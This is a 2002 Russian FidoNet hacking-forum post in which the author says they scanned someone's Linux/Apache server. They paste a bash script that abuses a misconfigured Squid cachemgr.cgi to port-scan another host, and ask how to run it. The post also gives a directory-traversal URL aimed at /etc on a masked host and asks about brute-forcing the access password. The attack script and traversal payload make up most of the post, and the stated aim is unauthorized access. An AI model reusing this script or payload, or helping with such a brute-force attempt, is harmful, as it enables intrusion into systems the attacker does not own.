ru.nethack

 
 - RU.NETHACK -------------------------------------------------------------------
 From : ‚« ¤ ЏҐаиЁ­                          2:5067/2.1000  21 Feb 2002  23:13:02
 To : All
 Subject : ?
 -------------------------------------------------------------------------------- 
 

 >        Куда ты денешься, All, ты же на подводной лодке!
 
     просканил один сервачек под линухом на Апаче.
 Есть дыра в Cache Manager Interface - вываливаетс в браузере запрос пасворда и
 имя менеджера , порта  и хоста. ашел в инете эксплойт для дырки. о вопрос:
 чем мне его откомпилить ? как заюзать ? (только не говорите, что надо стаить
 Линух :)
 Вот сам эксплоит
 
 === Cut ===
 #!/bin/bash -x
 
 # Port scanning using a misconfigured squid
 # using open apache
 
 # Usage miscachemgr host_vuln host_to_scan end_port
 
 # Concept: Jacobo Van Leeuwen & Francisco Sсa Muёoz
 # Coded by Francisco Sсa Muёoz
 # IP6 [Logic Control]
 
 PORT=1
 ONE='/cgi-bin/cachemgr.cgi?host='
 TWO='&port='
 THREE='&user_name=&operation&auth='
 
 mkdir from_$1_to_$2
 
 while [ $PORT -lt $3 ]; do
 
 # lynx -dump http://$1/cgi-bin/cachemgr.cgi?host=\
 # $2&port=$PORT&user_name=&operation=authenticate&auth= > \
 # port_$1_to_$2/$PORT.log 2>&1
 
 lynx -dump http://$1$ONE$2$TWO$PORT$THREE > from_$1_to_$2/$PORT.log 2>&1
 let PORT=PORT+1
 
 done
 
 === Cut ===
 Плюс еще одна дырка
 
 ххх.ххх.ххх.ххх:3128/index.php?chemin=..%2F..%2F..%2F..%2F..%2F..%2F%2Fetc
 
 Тоже требует пароль на доступ :(
 
 Может каким - нибуть брут форсем штурмом взять ?
  -ДНэфэНД-
     ЪД
     АД У вАжЕнИеМ , ВлАд.       Чет Фев 21 2002   22:13
 --- Fatal ERROR: Restart you life in MS-DOS Mode !
  * Origin: Будут мысли-пишите, будут деньги-высылайте ! (2:5067/2.1000)
 
 

Вернуться к списку тем, сортированных по: возрастание даты  уменьшение даты  тема  автор 

Тема:    Автор:    Дата:    ?   ‚« ¤ ЏҐаиЁ­   21 Feb 2002 23:13:02   ?   Dmitry Radishev   27 Feb 2002 00:38:16